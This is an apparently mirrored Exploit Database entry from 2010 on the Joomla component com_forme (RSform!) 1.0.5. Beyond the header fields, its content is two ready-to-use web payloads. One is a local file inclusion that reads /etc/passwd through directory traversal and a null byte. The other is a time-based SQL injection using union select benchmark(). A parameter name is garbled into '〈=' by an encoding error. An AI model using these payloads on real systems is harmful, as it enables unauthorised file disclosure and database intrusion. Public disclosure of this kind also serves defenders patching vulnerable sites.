Joomla! Component com_forme 1.0.5 – Multiple Vulnerabilities

• Exploit Database
• 10 阅读

• 作者： jdc
  日期： 2010-11-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15443/

• # Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
  # Date: 06.11.2010
  # Author: jdc
  # Software Link: 
  http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265
  # Version: 1.0.5
  
  Local File Include
  ------------------
  ?option=com_forme
  〈=../../../../../../../../../etc/passwd%00
  
  SQL Injection
  -------------
  ?option=com_forme
  〈=-1' union select benchmark(1000000,md5(1)) -- '
  
  NOTE: RSform! Pro is not affected...
  
  6 Nov 2010
  jdc